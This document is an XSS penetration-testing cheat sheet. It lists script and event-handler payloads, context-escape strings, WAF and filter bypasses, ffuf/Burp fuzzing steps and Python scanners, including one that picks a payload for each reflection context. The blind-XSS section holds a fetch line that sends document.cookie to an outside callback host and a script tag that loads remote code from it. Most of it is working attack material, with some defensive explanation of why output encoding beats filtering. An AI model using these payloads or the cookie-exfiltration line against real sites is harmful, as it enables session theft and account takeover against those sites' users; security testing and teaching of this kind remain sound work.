Cross-Site Scripting (XSS)

Quick Payloads

Basic XSS

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<div onmouseover="alert(1)">Hover me</div>

Event Handlers

onclick=alert(1)
onmouseover=alert(1)
onerror=alert(1)
onload=alert(1)
onfocus=alert(1)
onblur=alert(1)

URL Schemes (pseudo-protocols)

# These belong in href/src/location sinks, not in event handlers
javascript:alert(1)
# Modern browsers block top-level navigation to data: URLs; it still works as an iframe src
data:text/html,<script>alert(1)</script>
# vbscript: only ever ran in legacy Internet Explorer
vbscript:alert(1)

DOM Based (JavaScript sinks)

# Attacker-controlled input (e.g. location.hash, document.referrer) that reaches one of these sinks runs as code
document.write('<script>alert(1)</script>')
eval('alert(1)')
setTimeout('alert(1)',0)
setInterval('alert(1)',0)

Testing Methodology

1. Parameter Fuzzing

# Using ffuf (-mr keeps only responses that reflect the payload unencoded; every payload in the list contains alert(1))
ffuf -u "http://target.com/page?param=FUZZ" -w xss-payloads.txt -mr 'alert\(1\)'

# Using Burp Suite
1. Intercept the request
2. Send it to Intruder
3. Mark the parameter as the insertion point
4. Load the payload list
5. Grep-match responses for the payload to spot unencoded reflection

2. Common Test Points

URL Parameters: ?search=<script>alert(1)</script>
Form Fields: <input name="username" value="<script>alert(1)</script>">
Headers: User-Agent: <script>alert(1)</script>
JSON: {"name": "<script>alert(1)</script>"}

3. Context Testing

# HTML Context (reflected between tags): any tag works
<div><script>alert(1)</script></div>
<div><img src=x onerror=alert(1)></div>

# Attribute Context: the payload "><script>alert(1)</script> closes the quoted value and the tag first
<input value=""><script>alert(1)</script>">
<input value=""><img src=x onerror=alert(1)>">

# JavaScript Context: a <script> nested inside a string does not run (the HTML parser ends the
# block at the first </script> and leaves an unterminated string). Either break out of the
# script block entirely, or close the string with the matching quote and comment out the rest.
# If the app backslash-escapes quotes, inject \";alert(1);// instead so the result is \\" (escaped backslash, live quote).
<script>var x = "</script><script>alert(1)</script>";</script>
<script>var x = "";alert(1);//";</script>
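The three steps above are one procedure: inject a canary, find where it lands, then send the payload built for that context. The following classifier is an added example written for this page (it is not the original author's code); the response bodies in SAMPLES are constructed, not captured from any target, and the context names and the canary string are arbitrary choices made here.

```python
import re

# Unique canary to inject first: where it lands in the response tells you the
# context and therefore which payload from the cheat sheet to send next.
CANARY = "xq7zcanary"

# Cheat-sheet payloads keyed by reflection context. For the JS-string contexts
# the leading quote must match the one enclosing the reflection, and the
# trailing // comments out whatever the page appends after it.
PAYLOADS = {
    "html": "<img src=x onerror=alert(1)>",
    "attr_dq": '"><img src=x onerror=alert(1)>',
    "attr_sq": "'><img src=x onerror=alert(1)>",
    "attr_unquoted": "x onmouseover=alert(1) y=",
    "js_string_dq": '";alert(1);//',
    "js_string_sq": "';alert(1);//",
    "js_code": "</script><script>alert(1)</script>",
}

# Constructed sample responses (assumed shapes, not captured from a real site).
SAMPLES = {
    "search": "<h1>Results for xq7zcanary</h1>",
    "input": '<form><input name="q" value="xq7zcanary"></form>',
    "link": "<a href='/tag/xq7zcanary'>tag</a>",
    "bare": "<div data-q=xq7zcanary></div>",
    "js_dq": '<script>var q = "xq7zcanary"; search(q);</script>',
    "js_sq": "<script>var q = 'xq7zcanary';</script>",
    "js_code": "<script>track(xq7zcanary);</script>",
    "none": "<p>nothing here</p>",
}

SCRIPT_OPEN = re.compile(r"<script\b[^>]*>", re.I)
SCRIPT_CLOSE = re.compile(r"</script\s*>", re.I)


def _open_js_quote(script_text):
    """Return the quote char of the string literal still open at the end of script_text, or None."""
    quote = None
    i = 0
    while i < len(script_text):
        ch = script_text[i]
        if quote:
            if ch == "\\":
                i += 1  # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "'\"`":
            quote = ch
        i += 1
    return quote


def reflection_context(body, canary=CANARY):
    """Classify the first reflection of canary in body."""
    idx = body.find(canary)
    if idx == -1:
        return "not_reflected"
    before = body[:idx]

    # Inside a <script> block when more script tags were opened than closed.
    opens = list(SCRIPT_OPEN.finditer(before))
    if len(opens) > len(SCRIPT_CLOSE.findall(before)):
        quote = _open_js_quote(before[opens[-1].end():])
        if quote == '"':
            return "js_string_dq"
        if quote == "'":
            return "js_string_sq"
        return "js_code"

    # Inside a tag when the most recent '<' has not yet been closed by '>'.
    last_lt, last_gt = before.rfind("<"), before.rfind(">")
    if last_lt > last_gt:
        tag = before[last_lt:]
        value = tag[tag.rfind("=") + 1:].lstrip() if "=" in tag else ""
        # An odd number of quote characters means the quoted value is still open.
        if value.startswith('"') and value.count('"') % 2 == 1:
            return "attr_dq"
        if value.startswith("'") and value.count("'") % 2 == 1:
            return "attr_sq"
        return "attr_unquoted"
    return "html"


def suggest_payload(body, canary=CANARY):
    """Return (context, payload) for the first reflection; payload is None when not reflected."""
    ctx = reflection_context(body, canary)
    return ctx, PAYLOADS.get(ctx)


def classify_samples():
    """Run the classifier over the constructed samples."""
    return {name: suggest_payload(body)[0] for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for name, ctx in classify_samples().items():
        print(f"{name:8} -> {ctx:14} {PAYLOADS.get(ctx)}")
```

The classifier only looks at the first reflection and ignores HTML comments and CSS; for a real target, feed it the body from the request that carried the canary and confirm execution in a browser, since a correctly chosen payload can still be stopped by a CSP or by encoding applied after the point you inspected.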

Common Vulnerable Endpoints

Search Forms

# Usually reflected: the payload fires only in the response to the request that carries it
search=<script>alert(1)</script>
search=<img src=x onerror=alert(1)>
search=<svg onload=alert(1)>

Comment Sections

# Usually stored: the payload persists and fires for every viewer, including moderators and admins
comment=<script>alert(1)</script>
comment=<img src=x onerror=alert(1)>
comment=<svg onload=alert(1)>

User Profiles

# Stored; an avatar upload that accepts SVG runs the onload when the file is opened directly (not when embedded via <img>)
name=<script>alert(1)</script>
bio=<img src=x onerror=alert(1)>
avatar=<svg onload=alert(1)>

Tools & Commands

XSS Hunter (blind XSS callback)

# Basic payload: the script loads from your XSS Hunter subdomain and reports back where and when it fired.
# The original hosted service shut down in 2023; point this at a self-hosted XSS Hunter Express instance or another callback server you control.
<script src="https://xss.ht"></script>

# Minimal callback without XSS Hunter: exfiltrate document.cookie to a server you control
# (cookies flagged HttpOnly are not readable from JavaScript, so an empty callback is still proof of execution)
<script>fetch('https://xss.ht/'+document.cookie)</script>

Custom Python Script

import requests

def test_xss(url, param, payloads, method="GET", timeout=10):
    """Send each payload in `param` and report the ones reflected unencoded.
    Reflection is only a lead: the string may land in a context where it does
    not execute, so confirm every hit in a browser."""
    for payload in payloads:
        data = {param: payload}
        if method.upper() == "POST":
            r = requests.post(url, data=data, timeout=timeout)
        else:
            r = requests.get(url, params=data, timeout=timeout)
        if payload in r.text:
            print(f"Potential XSS ({method} {param}): {payload}")

Common Bypass Techniques

WAF Bypass

# Case variation: beats case-sensitive signatures; HTML tag and attribute names are case-insensitive
<ScRiPt>alert(1)</ScRiPt>
<IMG src=x OnErRoR=alert(1)>

# Encoding: an entity-encoded < never opens a tag by itself; it only helps when the app decodes
# entities before output. URL encoding is undone by the server, so it only hides the payload
# from a filter that inspects the raw request.
&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;
%3Cscript%3Ealert(1)%3C/script%3E

# Double encoding: works when the WAF decodes once and the application decodes again
%253Cscript%253Ealert(1)%253C/script%253E

Filter Bypass

# Script tag bypass: defeats a filter that strips <script> / </script> once, non-recursively
<scr<script>ipt>alert(1)</scr</script>ipt>
# Alternative tags when <script> is blocked, or when the injection happens after page load
# (a <script> inserted via innerHTML does not execute, but an onerror/onload handler does)
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

# Event handler bypass: tag blacklists usually overlook ordinary elements carrying handlers
<div onmouseover="alert(1)">Hover me</div>
<body onload=alert(1)>
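To see exactly which filter each bypass above defeats, here is an added example (written for this page, not code from the original author or from any WAF product) that runs the page's payloads through three progressively stricter blacklist filters and through proper output encoding, and simulates the double-decoding path behind the double-encoding bypass. The filters are hypothetical reconstructions of common mistakes, not any specific product's logic.

```python
import html
import re
from urllib.parse import unquote

SCRIPT_TAG = re.compile(r"</?script>")
SCRIPT_TAG_CI = re.compile(r"</?script>", re.I)

# Payloads from the bypass section, plus the plain one every filter must stop.
BYPASS_PAYLOADS = {
    "plain": "<script>alert(1)</script>",
    "case": "<ScRiPt>alert(1)</ScRiPt>",
    "nested": "<scr<script>ipt>alert(1)</scr</script>ipt>",
    "img": "<img src=x onerror=alert(1)>",
}


def strip_once(value):
    """Flawed filter 1: removes <script>/</script> once, case-sensitively."""
    return SCRIPT_TAG.sub("", value)


def _strip_until_stable(value, pattern):
    while True:
        stripped = pattern.sub("", value)
        if stripped == value:
            return value
        value = stripped


def strip_recursive(value):
    """Flawed filter 2: repeats the removal until nothing changes (closes the nesting hole only)."""
    return _strip_until_stable(value, SCRIPT_TAG)


def strip_recursive_ci(value):
    """Flawed filter 3: recursive and case-insensitive, but still a tag blacklist."""
    return _strip_until_stable(value, SCRIPT_TAG_CI)


def encode_output(value):
    """The real fix: HTML-encode at output time so no input can open a tag."""
    return html.escape(value, quote=True)


def still_dangerous(rendered):
    """Crude check: a raw '<' that starts a tag survived into the HTML."""
    return re.search(r"<[a-z]", rendered, re.I) is not None


FILTERS = {
    "strip_once": strip_once,
    "strip_recursive": strip_recursive,
    "strip_recursive_ci": strip_recursive_ci,
    "encode_output": encode_output,
}


def evaluate():
    """Which payloads get past which filter? Returns {filter: [surviving payload names]}."""
    return {
        name: [p for p, payload in BYPASS_PAYLOADS.items() if still_dangerous(fn(payload))]
        for name, fn in FILTERS.items()
    }


def decode_double_encoded(raw):
    """Simulate a WAF that URL-decodes once, then an app that decodes the parameter again."""
    after_waf = unquote(raw)
    after_app = unquote(after_waf)
    return after_waf, after_app


if __name__ == "__main__":
    for name, survivors in evaluate().items():
        print(f"{name:20} bypassed by: {survivors or 'nothing'}")
    print(decode_double_encoded("%253Cscript%253Ealert(1)%253C/script%253E"))
```

Each blacklist fix closes one bypass and leaves the next one open; only encoding at the output sink stops the whole set, which is why the bypass list on this page is really a list of reasons not to filter input. The double-decoding function shows the precondition for the `%25` trick: the WAF sees `%3Cscript%3E`, which matches no signature, and the application turns it into a live tag.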

References

OWASP XSS
PortSwigger XSS
XSS Hunter